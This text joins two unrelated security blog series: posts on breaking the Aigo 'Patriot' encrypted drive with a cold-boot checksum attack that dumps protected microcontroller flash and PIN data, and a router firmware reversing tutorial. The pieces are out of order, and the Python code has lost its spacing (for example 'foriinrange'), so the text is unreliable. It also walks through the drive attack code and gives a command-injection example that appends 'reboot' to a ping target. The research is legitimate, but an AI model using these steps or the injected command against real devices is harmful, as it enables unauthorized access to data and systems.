The result is depressing: everything is protected in “Disable external read and write” mode ; so we cannot even write to the flash to insert a ROM dumper. The only way to reset the protection is to erase the whole chip 🙁
First (failed) attack: ROMX
However, we can try a trick: since we can execute arbitrary opcodes, why not execute ROMX, which is used to read the flash ?
The reasoning here is that the SROM ReadBlock function used by the programming vectors will verify if it is called from ISSP. However, the ROMX opcode probably has no such check.
So, in Python (after adding a few helpers in the Arduino C code):
foriinrange(0,8192):write_reg(0xF0,i>>8)# A = 0write_reg(0xF3,i&0xFF)# X = 0exec_opcodes("\x28\x30\x40")# ROMX, HALT, NOPbyte=read_reg(0xF0)# ROMX reads ROM[A|X] into Aprint"%02x"%ord(byte)# print ROM byte
Unfortunately, it does not work 🙁 Or rather, it works, but we get our own opcodes (0x28 0x30 0x40) back ! I do not think it was intended as a protection, but rather as an engineering trick: when executing external opcodes, the ROM bus is rewired to a temporary buffer.
Which is just a call to SROM function 0x07, documented as follows (emphasis mine):
The Checksum function calculates a 16-bit checksum over a user specifiable number of blocks, within a single Flash bank starting at block zero. The BLOCKID parameter is used to pass in the number of blocks to checksum. A BLOCKID value of ‘1’ will calculate the checksum of only block 0, while a BLOCKID value of ‘0’ will calculate the checksum of 256 blocks in the bank. The 16-bit checksum is returned in KEY1 and KEY2. The parameter KEY1 holds the lower 8 bits of the checksum and the parameter KEY2 holds the upper 8 bits of the checksum. For devices with multiple Flash banks, the checksum func- tion must be called once for each Flash bank. The SROM Checksum function will operate on the Flash bank indicated by the Bank bit in the FLS_PR1 register.
Note that it is an actual checksum: bytes are summed one by one, no fancy CRC here. Also, considering the extremely limited register set of the M8C core, I suspected that the checksum would be directly stored in RAM, most probably in its final location: KEY1 (0xF8) / KEY2 (0xF9).
So the final attack is, in theory:
Connect using ISSP
Start a checksum computation using the CHECKSUM-SETUP vector
Reset the CPU after some time T
Read the RAM to get the current checksum C
Repeat 3. and 4., increasing T a little each time
Recover the flash content by substracting consecutive checkums C
However, we have a problem: the Initialize-1 vector, which we have to send after reset, overwrites KEY1 and KEY:
Waits for the appropriate amount of time, with some caveats:
I lost some time here until I realized delayMicroseconds is precise only up to 16383µs)
and then again because delayMicroseconds(0) is totally wrong !
Resets the PSoC to prog mode (without sending the initialization vectors, just the magic)
The final Python code is:
fordelayinrange(0,150000):# delay in microsecondsforiinrange(0,10):# number of reads for each delaytry:reset_psoc(quiet=True)# reset and enter prog modesend_vectors()# send init vectorsser.write("\x85"+struct.pack(">I",delay))# do checksum + reset after delayres=ser.read(1)# read arduino ACKexceptExceptionase:printeser.close()os.system("timeout -s KILL 1s picocom -b 115200 /dev/ttyACM0 2>&1 > /dev/null")ser=serial.Serial('/dev/ttyACM0',115200,timeout=0.5)# open serial portcontinueprint"%05d %02X %02X %02X"%(delay,# read RAM bytesread_regb(0xf1),read_ramb(0xf8),read_ramb(0xf9))
What it does is simple:
Reset the PSoC (and send the magic)
Send the full initialization vectors
Call the Cmnd_STK_START_CSUM (0x85) function on the Arduino, with a delay argument in microseconds.
Reads the checksum (0xF8 and 0xF9) and the 0xF1 undocumented registers
This, 10 times per 1 microsecond step.
0xF1 is included as it was the only register that seemed to change while computing the checksum. It could be some temporary register used by the ALU ?
Note the ugly hack I use to reset the Arduino using picocom, when it stops responding (I have no idea why).
Reading the results
The output of the Python script looks like this (simplified for readability):
DELAY F1 F8 F9 # F1 is the unknown reg
# F8 is the checksum LSB
# F9 is the checksum MSB
00000 03 E1 19
00016 F9 00 03
00016 F9 00 00
00016 F9 00 03
00016 F9 00 03
00016 F9 00 03
00016 F9 00 00 # Checksum is reset to 0
00017 FB 00 00
00023 F8 00 00
00024 80 80 00 # First byte is 0x0080-0x0000 = 0x80
00024 80 80 00
00024 80 80 00
00057 CC E7 00 # 2nd byte is 0xE7-0x80: 0x67
00057 CC E7 00
00057 01 17 01 # I have no idea what's going on here
00057 01 17 01
00057 01 17 01
00058 D0 17 01
00058 D0 17 01
00058 D0 17 01
00058 D0 17 01
00058 F8 E7 00 # E7 is back ?
00058 D0 17 01
00059 E7 E7 00
00060 17 17 00 # Hmmm
00062 00 17 00
00062 00 17 00
00063 01 17 01 # Oh ! Carry is propagated to MSB
00063 01 17 01
00075 CC 17 01 # So 0x117-0xE7: 0x30
We however have the the problem that since we have a real check sum, a null byte will not change the value, so we cannot only look for changes in the checksum. But, since the full (8192 bytes) computation runs in 0.1478s, which translates to about 18.04µs per byte, we can use this timing to sample the value of the checksum at the right points in time.
Of course at the beginning, everything is “easy” to read as the variation in execution time is negligible. But the end of the dump is less precise as the variability of each run increases:
134023 D0 02 DD
134023 CC D2 DC
134023 CC D2 DC
134023 CC D2 DC
134023 FB D2 DC
134023 3F D2 DC
134023 CC D2 DC
134024 02 02 DC
134024 CC D2 DC
134024 F9 02 DC
134024 03 02 DD
134024 21 02 DD
134024 02 D2 DC
134024 02 02 DC
134024 02 02 DC
134024 F8 D2 DC
134024 F8 D2 DC
134025 CC D2 DC
134025 EF D2 DC
134025 21 02 DD
134025 F8 D2 DC
134025 21 02 DD
134025 CC D2 DC
134025 04 D2 DC
134025 FB D2 DC
134025 CC D2 DC
134025 FB 02 DD
134026 03 02 DD
134026 21 02 DD
Hence the 10 dumps for each µs of delay. The total running time to dump the 8192 bytes of flash was about 48h.
Reconstructing the flash image
I have not yet written the code to fully recover the flash, taking into account all the timing problems. However, I did recover the beginning. To make sure it was correct, I disassembled it with m8cdis:
0000: 80 67 jmp 0068h ; Reset vector
0068: 71 10 or F,010h
006a: 62 e3 87 mov reg[VLT_CR],087h
006d: 70 ef and F,0efh
006f: 41 fe fb and reg[CPU_SCR1],0fbh
0072: 50 80 mov A,080h
0074: 4e swap A,SP
0075: 55 fa 01 mov [0fah],001h
0078: 4f mov X,SP
0079: 5b mov A,X
007a: 01 03 add A,003h
007c: 53 f9 mov [0f9h],A
007e: 55 f8 3a mov [0f8h],03ah
0081: 50 06 mov A,006h
0083: 00 ssc
0122: 18 pop A
0123: 71 10 or F,010h
0125: 43 e3 10 or reg[VLT_CR],010h
0128: 70 00 and F,000h ; Paging mode changed from 3 to 0
012a: ef 62 jacc 008dh
012c: e0 00 jacc 012dh
012e: 71 10 or F,010h
0130: 62 e0 02 mov reg[OSC_CR0],002h
0133: 70 ef and F,0efh
0135: 62 e2 00 mov reg[INT_VC],000h
0138: 7c 19 30 lcall 1930h
013b: 8f ff jmp 013bh
013d: 50 08 mov A,008h
013f: 7f ret
It looks good !
Locating the PIN address
Now that we can read the checksum at arbitrary points in time, we can check easily if and where it changes after:
entering a wrong PIN
changing the PIN
First, to locate the approximate location, I dumped the checksum in steps for 10ms after reset. Then I entered a wrong PIN and did the same.
The results were not very nice as there’s a lot of variation, but it appeared that the checksum changes between 120000µs and 140000µs of delay. Which was actually completely false and an artefact of delayMicrosecondsdoing non-sense when called with 0.
Then, after losing about 3 hours, I remembered that the SROM’s CheckSum syscall has an argument that allows to specify the number of blocks to checksum ! So we can easily locate the PIN and “bad PIN” counter down to a 64-byte block.
Note that the delay values I used are probably valid only on the specific PSoC I have.
What’s next ?
So, to sum up on the PSoC side in the context of our Aigo HDD:
we can read the SRAM even when it’s protected (by design)
we can bypass the flash read protection by doing a cold-boot stepping attack and read the PIN directly
However, the attack is a bit painful to mount because of timing issues. We could improve it by:
writing a tool to correctly decode the cold-boot attack output
using a FPGA for more precise timings (or use Arduino hardware timers)
trying another attack: “enter wrong PIN, reset and dump RAM”, hopefully the good PIN will be stored in RAM for comparison. However, it is not easily doable on Arduino, as it outputs 5V while the board runs on 3.3V.
One very cool thing to try would be to use voltage glitching to bypass the read protection. If it can be made to work, it would give us absolutely accurate reads of the flash, instead of having to rely on checksum readings with poor timings.
As the SROM probably reads the flash protection bits in the ReadBlock “syscall”, we can maybe do the same as in described on Dmitry Nedospasov’s blog, a reimplementation of Chris Gerlinsky’s attack presented at REcon Brussels 2017.
One other fun thing would also be to decap the chip and image it to dump the SROM, uncovering undocumented syscalls and maybe vulnerabilities ?
To conclude, the drive’s security is broken, as it relies on a normal (not hardened) micro-controller to store the PIN… and I have not (yet) checked the data encryption part !
What should Aigo have done ? After reviewing a few encrypted HDD models, I did a presentation at SyScan in 2015 which highlights the challenges in designing a secure and usable encrypted external drive and gives a few options to do something better 🙂
Overall, I spent 2 week-ends and a few evenings, so probably around 40 hours from the very beginning (opening the drive) to the end (dumping the PIN), including writing those 2 blog posts. A very fun and interesting journey 😉
Analyzing and breaking external encrypted HDD has been a “hobby” of mine for quite some time. With my colleagues Joffrey Czarny and Julien Lenoir we looked at several models in the past:
Here I am going to detail how I had fun with one drive a colleague gave me: the Chinese Aigo “Patriot” SK8671, which follows the classical design for external encrypted HDDs: a LCD for information diplay and a keyboard to enter the PIN.
DISCLAIMER: This research was done on my personal time and is not related to my employer.
The user must input a password to access data, which is supposedly encrypted.
Note that the options are very limited:
the PIN can be changed by pressing F1 before unlocking
the PIN must be between 6 and 9 digits
there is a wrong PIN counter, which (I think) destroys data when it reaches 15 tries.
In practice, F2, F3 and F4 are useless.
Of course one of the first things we do is tear down everything to identify the various components.
Removing the case is actually boring, with lots of very small screws and plastic to break.
In the end, we get this (note that I soldered the 5 pins header):
Unfortunately it does not seem obviously useful as:
the content did not change after changing the PIN
the flash is actually never accessed after boot
So it probably only holds the firmware for the JMicron controller, which embeds a 8051 microcontroller.
One way to find which chip is responsible for what is to check communications for interesting timing/content.
As we know, the USB-SATA controller is connected to the screen and the Cypress µC through the CN1 connector and the two ribbons. So, we hook probes to the 3 relevant pins:
P4, generic I/O in the datasheet
P11, I²C SCL in the datasheet
P13, I²C SDA in the datasheet
We then launch Saleae logic analyzer, set the trigger and enter “123456✓” on the keyboard. Which gives us the following view:
You can see 3 differents types of communications:
on the P4 channel, some short bursts
on P11 and P13, almost continuous exchanges
Zooming on the first P4 burst (blue rectangle in previous picture), we get this :
You can see here that P4 is almost 70ms of pure regular signal, which could be a clock. However, after spending some time making sense of this, I realized that it was actually a signal for the “beep” that goes off every time a key is touched… So it is not very useful in itself, however, it is a good marker to know when a keypress was registered by the PSoC.
However, we have on extra “beep” in the first picture, which is slightly different: the sound for “wrong pin” !
Going back to our keypresses, when zooming at the end of the beep (see the blue rectangle again), we get:
Where we have a regular pattern, with a (probable) clock on P11 and data on P13. Note how the pattern changes after the end of the beep. It could be interesting to see what’s going on here.
2-wires protocols are usually SPI or I²C, and the Cypress datasheet says the pins correspond to I²C, which is apparently the case:
The USB-SATA chipset constantly polls the PSoC to read the key state, which is ‘0’ by default. It then changes to ‘1’ when key ‘1’ was pressed.
The final communication, right after pressing “✓”, is different if a valid PIN is entered. However, for now I have not checked what the actual transmission is and it does not seem that an encryption key is transmitted.
Anyway, see part 2 to read how I did dump the PSoC internal flash.
In part 4 we extracted the entire firmware from the router and decompressed it. As I explained then, you can often get most of the firmware directly from the manufacturer’s website: Firmware upgrade binaries often contain partial or entire filesystems, or even entire firmwares.
In this post we’re gonna dig through the firmware to find potentially interesting code, common vulnerabilities, etc.
I’m gonna explain some basic theory on the Linux architecture, disassembling binaries, and other related concepts. Feel free to skip some of the parts marked as [Theory]; the real hunt starts at ‘Looking for the Default WiFi Password Generation Algorithm’. At the end of the day, we’re just: obtaining source code in case we can use it, using grep and common sense to find potentially interesting binaries, and disassembling them to find out how they work.
One step at a time.
Gathering and Analysing Open Source Components
GPL Licenses — What They Are and What to Expect [Theory]
Linux, U-Boot and other tools used in this router are licensed under the General Public License. This license mandates that the source code for any binaries built with GPL’d projects must be made available to anyone who wants it.
Having access to all that source code can be a massive advantage during the reversing process. The kernel and the bootloader are particularly interesting, and not just to find security issues.
When hunting for GPL’d sources you can usually expect one of these scenarios:
The code is freely available on the manufacturer’s website, nicely ordered and completely open to be tinkered with. For instance: apple products or theamazon echo
The source code is available by request
They send you an email with the sources you requested
They ask you for “a reasonable amount” of money to ship you a CD with the sources
In the case of this router, the source code was available on their website, even though it was a huge pain in the ass to find; it took me a long time of manual and automated searching but I ended up finding it in the mobile version of the site:
But what if they’re hiding something!? How could we possibly tell whether the sources they gave us are the same they used to compile the production binaries?
Challenges of Binary Verification [Theory]
Theoretically, we could try to compile the source code ourselves and compare the resulting binary with the one we extracted from the device. In practice, that is extremely more complicated than it sounds.
The exact contents of the binary are strongly tied to the toolchain and overall environment they were compiled in. We could try to replicate the environment of the original developers, finding the exact same versions of everything they used, so we can obtain the same results. Unfortunately, most compilers are not built with output replicability in mind; even if we managed to find the exact same version of everything, details like timestamps, processor-specific optimizations or file paths would stop us from getting a byte-for-byte identical match.
If you’d like to read more about it, I can recommend this paper. The authors go through the challenges they had to overcome in order to verify that the official binary releases of the application ‘TrueCrypt’ were not backdoored.
Introduction to the Architecture of Linux [Theory]
In multiple parts of the series, we’ve discussed the different components found in the firmware: bootloader, kernel, filesystem and some protected memory to store configuration data. In order to know where to look for what, it’s important to understand the overall architecture of the system. Let’s quickly review this device’s:
The bootloader is the first piece of code to be executed on boot. Its job is to prepare the kernel for execution, jump into it and stop running. From that point on, the kernel controls the hardware and uses it to run user space logic. A few more details on each of the components:
Hardware: The CPU, Flash, RAM and other components are all physically connected
Linux Kernel: It knows how to control the hardware. The developers take the Open Source Linux kernel, write drivers for their specific device and compile everything into an executable Kernel. It manages memory, reads and writes hardware registers, etc. In more complex systems, “kernel modules” provide the possibility of keeping device drivers as separate entities in the file system, and dynamically load them when required; most embedded systems don’t need that level of versatility, so developers save precious resources by compiling everything into the kernel
libc (“The C Library”): It serves as a general purpose wrapper for the System Call API, including extremely common functions like printf, malloc or system. Developers are free to call the system call API directly, but in most cases, it’s MUCH more convenient to use libc. Instead of the extremely common glibc (GNU C library) we usually find in more powerful systems, this device uses a version optimised for embedded devices: uClibc.
User Applications: Executable binaries in /bin/ and shared objects in /lib/(libraries that contain functions used by multiple binaries) comprise most of the high-level logic. Shared objects are used to save space by storing commonly used functions in a single location
Bootloader Source Code
As I’ve mentioned multiple times over this series, this router’s bootloader is U-Boot. U-Boot is GPL licensed, but Huawei failed to include the source code in their website’s release.
Having the source code for the bootloader can be very useful for some projects, where it can help you figure out how to run a custom firmware on the device or modify something; some bootloaders are much more feature-rich than others. In this case, I’m not interested in anything U-Boot has to offer, so I didn’t bother following up on the source code.
Kernel Source Code
Let’s just check out the source code and look for anything that might help. Remember the factory reset button? The button is part of the hardware layer, which means the GPIO pin that detects the button press must be controlled by the drivers. These are the logs we saw coming out of the UART port in a previous post:
With some simple grep commands we can see how the different components of the system (kernel, binaries and shared objects) can work together and produce the serial output we saw:
Having the kernel can help us find poorly implemented security-related algorithms and other weaknesses that are sometimes considered ‘accepted risks’ by manufacturers. Most importantly, we can use the drivers to compile and run our own OS on the device.
User Space Source Code
As we can see in the GPL release, some components of the user space are also open source, such as busybox and iptables. Given the right (wrong) versions, public vulnerability databases could be enough to find exploits for any of these.
That being said, if you’re looking for 0-days, backdoors or sensitive data, your best bet is not the open source projects. Devic specific and closed source code developed by the manufacturer or one of their providers has not been so heavily tested and may very well be riddled with bugs. Most of this code is stored as binaries in the user space; we’ve got the entire filesystem, so we’re good.
Without the source code for user space binaries, we need to find a way to read the machine code inside them. That’s where disassembly comes in.
Binary Disassembly [Theory]
The code inside every executable binary is just a compilation of instructions encoded as Machine Code so they can be processed by the CPU. Our processor’s datasheet will explain the direct equivalence between assembly instructions and their machine code representations. A disassembler has been given that equivalence so it can go through the binary, find data and machine code andtranslate it into assembly. Assembly is not pretty, but at least it’s human-readable.
Due to the very low-level nature of the kernel, and how heavily it interacts with the hardware, it is incredibly difficult to make any sense of its binary. User space binaries, on the other hand, are abstracted away from the hardware and follow unix standards for calling conventions, binary format, etc. They’re an ideal target for disassembly.
There are lots of disassemblers for popular architectures like MIPS; some better than others both in terms of functionality and usability. I’d say these 3 are the most popular and powerful disassemblers in the market right now:
IDA Pro: By far the most popular disassembler/debugger in the market. It is extremely powerful, multi-platform, and there are loads of users, tutorials, plugins, etc. around it. Unfortunately, it’s also VERY expensive; a single person license of the Pro version (required to disassemble MIPS binaries) costs over $1000
Radare2: Completely Open Source, uses an impressively advanced command line interface, and there’s a great community of hackers around it. On the other hand, the complex command line interface -necessary for the sheer amount of features- makes for a rather steep learning curve
Binary Ninja: Not open source, but reasonably priced at $100 for a personal license, it’s middle ground between IDA and radare. It’s still a very new tool; it was just released this year, but it’s improving and gaining popularity day by day. It already works very well for some architectures, but unfortunately it’s still missing MIPS support (coming soon) and some other features I needed for these binaries. I look forward to giving it another try when it’s more mature
In order to display the assembly code in a more readable way, all these disasemblers use a “Graph View”. It provides an intuitive way to follow the different possible execution flows in the binary:
Such a clear representation of branches, and their conditionals, loops, etc. is extremely useful. Without it, we’d have to manually jump from one branch to another in the raw assembly code. Not so fun.
If you read the code in that function you can see the disassembler makes a great job displaying references to functions and hardcoded strings. That might be enough to help us find something juicy, but in most cases you’ll need to understand the assembly code to a certain extent.
Gathering Intel on the CPU and Its Assembly Code [Theory]
Because ELF headers are designed to be platform-agnostic, we can easily find out some info about our binaries. As you can see, we know the architecture (32-bit MIPS), endianness (LSB), and whether it uses shared libraries.
We can verify that information thanks to the Ralink’s product brief, which specifies the processor core it uses: MIPS24KEc
Once we know the basics we can just drop the binary into the disassembler. It will help validate some of our findings, and provide us with the assembly code. In order to understand that code we’re gonna need to know the architecture’s instruction sets and register names:
MIPS Alternate Register Names: In MIPS, there’s no real difference between registers; the CPU doesn’t about what they’re called. Alternate register names exist to make the code more readable for the developer/reverser: $a0 to $a3 for function arguments, $t0 to $t9 for temporary registers, etc.
Beyond instructions and registers, some architectures may have some quirks. One example of this would be the presence of delay slots in MIPS: Instructions that appear immediately after branch instructions (e.g. beqz, jalr) but are actually executed before the jump. That sort of non-linearity would be unthinkable in other architectures.
Following up on the reset key example we were using for the Kernel, we’ve got the code that generated some of the UART log messages, but not all of them. Since we couldn’t find the ‘button has been pressed’ string in the kernel’s source code, we can deduce it must have come from user space. Let’s find out which binary printed it:
3 files contain the next string found in the logs: 2 executables in /bin/ and 1 shared object in /lib/. Let’s take a look at /bin/equipcmd with IDA:
If we look closely, we can almost read the C code that was compiled into these instructions. We can see a “clear configuration file”, which would match the ERASEcommands we saw in the SPI traffic capture to the flash IC. Then, depending on the result, one of two strings is printed: restore default success or restore default fail . On success, it then prints something else, flushes some buffers and reboots; this also matches the behaviour we observed when we pressed the reset button.
That function is a perfect example of delay slots: the addiu instructions that set both strings as arguments —$a0— for the 2 puts are in the delay slots of the branch if equals zero and jump and link register instructions. They will actually be executed before branching/jumping.
As you can see, IDA has the name of all the functions in the binary. That won’t necessarily be the case in other binaries, and now’s a good time to discuss why.
Function Names in a Binary — Intro to Symbol Tables [Theory]
The ELF format specifies the usage of symbol tables: chunks of data inside a binary that provide useful debugging information. Part of that information are human-readable names for every function in the binary. This is extremely convenient for a developer debugging their binary, but in most cases it should be removed before releasing the production binary. The developers were nice enough to leave most of them in there 🙂
In order to remove them, the developers can use tools like strip, which know what must be kept and what can be spared. These tools serve a double purpose: They save memory by removing data that won’t be necessary at runtime, and they make the reversing process much more complicated for potential attackers. Function names give context to the code we’re looking at, which is massively helpful.
In some cases -mostly when disassembling shared objects- you may see somefunction names or none at all. The ones you WILL see are the Dynamic Symbols in the .dymsym table: We discussed earlier the massive amount of memory that can be saved by using shared objects to keep the pieces of code you need to re-use all over the system (e.g. printf()). In order to locate pieces of data inside the shared object, the caller uses their human-readable name. That means the names for functions and variables that need to be publicly accessible must be left in the binary. The rest of them can be removed, which is why ELF uses 2 symbol tables: .dynsym for publicly accessible symbols and .symtab for the internal ones.
If you recall, these are the default WiFi credentials in my router:
So what do we know?
Each device is pre-configured with a different set of WiFi credentials
The credentials could be hardcoded at the factory or generated on the device. Either way, we know from previous posts that both SSID and password are stored in the reserved area of Flash memory, and they’re right next to each other
If they were hardcoded at the factory, the router only needs to read them from a known memory location
If they are generated in the device and then stored to flash, there must be an algorithm in the router that -given the same inputs- always generates the same outputs. If the inputs are public (e.g. the MAC address) and we can find, reverse and replicate the algorithm, we could calculate default WiFi passwords for any other router that uses the same algorithm
Let’s see what we can do with that…
Finding Hardcoded Strings
Let’s assume there IS such algorithm in the router. Between username and password, there’s only one string that remains constant across devices:TALKTALK-. This string is prepended to the last 6 characters of the MAC address. If the generation algorithm is in the router, surely this string must be hardcoded in there. Let’s look it up:
2 of those 3 binaries (nmbd and smbd) are part of samba, the program used to use the USB flash drive as a network storage device. They’re probably used to identify the router over the network. Let’s take a look at the other one: /bin/cms.
Reversing the Functions that Uses Them
That looks exactly the way we’d expect the SSID generation algorithm to look. The code is located inside a rather large function called ATP_WLAN_Init, and somewhere in there it performs the following actions:
Find out the MAC address of the device we’re running on:
Unfortunately, right after this branch the function simply does an ATP_DBSave and moves on to start running commands and whatnot. e.g.:
Further inspection of this function and other references to ATP_DBSave did not reveal anything interesting.
After some time using this process to find potentially relevant pieces of code, reverse them, and analyse them, I didn’t find anything that looked like the password generation algorithm. That would confirm the suspicions I’ve had since we found the default credentials in the protected flash area: The manufacturer used proper security techniques and flashed the credentials at the factory, which is why there is no algorithm. Since the designers manufacture their own hardware, the decision makes perfect sense for this device. They can do whatever they want with their manufacturing lines, so they decided to do it right.
I might take another look at it in the future, or try to find it in some other router (I’d like to document the process of reversing it), but you should know this method DOES work for a lot of products. There’s a long history of freely available default WiFi password generators.
Since we already know how to find relevant code in the filesystem binaries, let’s see what else we can do with that knowledge.
Looking for Command Injection Vulnerabilities
One of the most common, easy to find and dangerous vulnerabilities is command injection. The idea is simple; we find an input string that is gonna be used as an argument for a shell command. We try to append our own commands and get them to execute, bypassing any filters that the developers may have implemented. In embedded devices, such vulnerabilities often result in full root control of the device.
These vulnerabilities are particularly common in embedded devices due to their memory constraints. Say you’re developing the web interface used by the users to configure the device; you want to add the possibility to ping a user-defined server from the router, because it’s very valuable information to debug network problems. You need to give the user the option to define the ping target, and you need to serve them the results:
Once you receive the data of which server to target, you have two options: You find a library with the ICMP protocol implemented and call it directly from the web backend, or you could use a single, standard function call and use the router’s already existing ping shell command. The later is easier to implement, saves memory, etc. and it’s the obvious choice. Taking user input (target server address) and using it as part of a shell command is where the danger comes in. Let’s see how this router’s web application, /bin/web, handles it:
A call to libc’s system() (not to be confused with a system call/syscall) is the easiest way to execute a shell command from an application. Sometimes developers wrap system() in custom functions in order to systematically filter all inputs, but there’s always something the wrapper can’t do or some developer who doesn’t get the memo.
Looking for references to system in a binary is an excellent way to find vectors for command injections. Just investigate the ones that look like may be using unfiltered user input. These are all the references to system() in the /bin/web binary:
Even the names of the functions can give you clues on whether or not a reference to system() will receive user input. We can also see some references to PIN and PUK codes, SIMs, etc. Seems like this application is also used in some mobile product…
I spent some time trying to find ways around the filtering provided byatp_gethostbyname (anything that isn’t a domain name causes an error), but I couldn’t find anything in this field or any others. Further analysis may prove me wrong. The idea would be to inject something to the effects of this:
Which would result in this final string being executed as a shell command: ping google.com -c 1; reboot; ping 192.168.1.1 > /dev/null. If the router reboots, we found a way in.
As I said, I couldn’t find anything. Ideally we’d like to verify that for all input fields, whether they’re in the web interface or some other network interface. Another example of a network interface potentially vulnerable to remote command injections is the “LAN-Side DSL CPE Configuration” protocol, or TR-064. Even though this protocol was designed to be used over the internal network only, it’s been used to configure routers over the internet in the past. Command injection vulnerabilities in some implementations of this protocol have been used to remotely extract data like WiFi credentials from routers with just a few packets.
This router has a binary conveniently named /bin/tr064; if we take a look, we find this right in the main() function:
That’s the private RSA key we found in Part 2 being used for SSL authentication. Now we might be able to supplant a router in the system and look for vulnerabilities in their servers, or we might use it to find other attack vectors. Most importantly, it closes the mistery of the private key we found while scouting the firmware.
Looking for More Complex Vulnerabilities [Theory]
Even if we couldn’t find any command injection vulnerabilities, there are always other vectors to gain control of the router. The most common ones are good old buffer overflows. Any input string into the router, whether it is for a shell command or any other purpose, is handled, modified and passed around the code. An error by the developer calculating expected buffer lengths, not validating them, etc. in those string operations can result in an exploitable buffer overflow, which an attacker can use to gain control of the system.
The idea behind a buffer overflow is rather simple: We manage to pass a string into the system that contains executable code. We override some address in the program so the execution flow jumps into the code we just injected. Now we can do anything that binary could do -in embedded systems like this one, where everything runs as root, it means immediate root pwnage.
Developing an exploit for this sort of vulnerability is not as simple as appending commands to find your way around a filter. There are multiple possible scenarios, and different techniques to handle them. Exploits using more involved techniques like ROP can become necessary in some cases. That being said, most household embedded systems nowadays are decades behind personal computers in terms of anti-exploitation techniques. Methods like Address Space Layout Randomization(ASLR), which are designed to make exploit development much more complicated, are usually disabled or not implemented at all.
If you’d like to find a potential vulnerability so you can learn exploit development on your own, you can use the same techniques we’ve been using so far. Find potentially interesting inputs, locate the code that manages them using function names, hardcoded strings, etc. and try to trigger a malfunction sending an unexpected input. If we find an improperly handled string, we might have an exploitable bug.
Once we’ve located the piece of disassembled code we’re going to attack, we’re mostly interested in string manipulation functions like strcpy, strcat,sprintf, etc. Their more secure counterparts strncpy, strncat, etc. are also potentially vulnerable to some techniques, but usually much more complicated to work with.
Even though I’m not sure that function -extracted from /bin/tr064— is passed any user inputs, it’s still a good example of the sort of code you should be looking for. Once you find potentially insecure string operations that may handle user input, you need to figure out whether there’s an exploitable bug.
Try to cause a crash by sending unexpectedly long inputs and work from there. Why did it crash? How many characters can I send without causing a crash? Which payload can I fit in there? Where does it land in memory? etc. etc. I may write about this process in more detail at some point, but there’s plenty of literature available online if you’re interested.
Don’t spend all your efforts on the most obvious inputs only -which are also more likely to be properly filtered/handled-; using tools like the burp web proxy (or even the browser itself), we can modify fields like cookies to check for buffer overflows.
Web vulnerabilities like CSRF are also extremely common in embedded devices with web interfaces. Exploiting them to write to files or bypass authentication can lead to absolute control of the router, specially when combined with command injections. An authentication bypass for a router with the web interface available from the Internet could very well expose the network to being remotely man in the middle’d. They’re definitely an important attack vector, even though I’m not gonna go into how to find them.
Decompiling Binaries [Theory]
When you decompile a binary, instead of simply translating Machine Code to Assembly Code, the decompiler uses algorithms to identify functions, loops, branches, etc. and replicate them in a higher level language like C or Python.
That sounds like a brilliant idea for anybody who has been banging their head against some assembly code for a few hours, but an additional layer of abstraction means more potential errors, which can result in massive wastes of time.
In my (admittedly short) personal experience, the output just doesn’t look reliable enough. It might be fine when using expensive decompilers (IDA itself supports a couple of architectures), but I haven’t found one I can trust with MIPS binaries. That being said, if you’d like to give one a try, the RetDec online decompiler supports multiple architectures- including MIPS.
Even as a ‘high level’ language, the code is not exactly pretty to look at.
Whether we want to learn something about an algorithm we’re reversing, to debug an exploit we’re developing or to find any other sort of vulnerability, being able to execute (and, if possible, debug) the binary on an environment we fully control would be a massive advantage. In some/most cases -like this router-, being able to debug on the original hardware is not possible. In the next post, we’ll work on CPU emulation to debug the binaries in our own computers.
Thanks for reading! I’m sorry this post took so long to come out. Between work,hardwear.io and seeing family/friends, this post was written about 1 paragraph at a time from 4 different countries. Things should slow down for a while, so hopefully I’ll be able to publish Part 6 soon. I’ve also got some other reversing projects coming down the pipeline, starting with hacking the Amazon Echo and a router with JTAG. I’ll try to get to those soon, work permitting… Happy Hacking 🙂
Tips and Tricks
Mistaken xrefs and how to remove them
Sometimes an address is loaded into a register for 16bit/32bit adjustments. The contents of that address have no effect on the rest of the code; it’s just a routinary adjustment. If the address that is assigned to the register happens to be pointing to some valid data, IDA will rename the address in the assembly and display the contents in a comment.
It is up to you to figure out whether an x-ref makes sense or not. If it doesn’t, select the variable and press o in IDA to ignore the contents and give you only the address. This makes the code much less confusing.
Setting function prototypes so IDA comments the args around calls for us
Set the cursor on a function and press y. Set the prototype for the function: e.g. int memcpy(void *restrict dst, const void *restrict src, int n);. Note:IDA only understands built-in types, so we can’t use types like size_t.
Once again we can use the extern declarations found in the GPL source code. When available, find the declaration for a specific function, and use the same types and names for the arguments in IDA.
Taking Advantage of the GPL Source Code
If we wanna figure out what are the 1st and 2nd parameters of a function likeATP_DBSetPara, we can sometimes rely on the GPL source code. Lots of functions are not implemented in the kernel or any other open source component, but they’re still used from one of them. That means we can’t see the code we’re interested in, but we can see the extern declarations for it. Sometimes the source will include documentation comments or descriptive variable names; very useful info that the disassembly doesn’t provide:
Unfortunately, the function documentation comment is not very useful in this case -seems like there were encoding issues with the file at some point, and everything written in Chinese was lost. At least now we know that the first argument is a list of keys, and the second is something they call ParamCMO. ParamCMO is a constant in our disassembly, so it’s probably just a reference to the key we’re trying to set.
Disassembly Methods — Linear Sweep vs Recursive Descent
The structure of a binary can vary greatly depending on compiler, developers, etc. How functions call each other is not always straightforward for a disassembler to figure out. That means you may run into lots of ‘orphaned’ functions, which exist in the binary but do not have a known caller.
Which disassembler you use will dictate whether you see those functions or not, some of which can be extremely important to us (e.g. the ping function in theweb binary we reversed earlier). This is due to how they scan binaries for content:
Linear Sweep: Read the binary one byte at a time, anything that looks like a function is presented to the user. This requires significant logic to keep false positives to a minimum
Recursive Descent: We know the binary’s entry point. We find all functions called from main(), then we find the functions called from those, and keep recursively displaying functions until we’ve got “all” of them. This method is very robust, but any functions not referenced in a standard/direct way will be left out
Make sure your disassembler supports linear sweep if you feel like you’re missing any data. Make sure the code you’re looking at makes sense if you’re using linear sweep.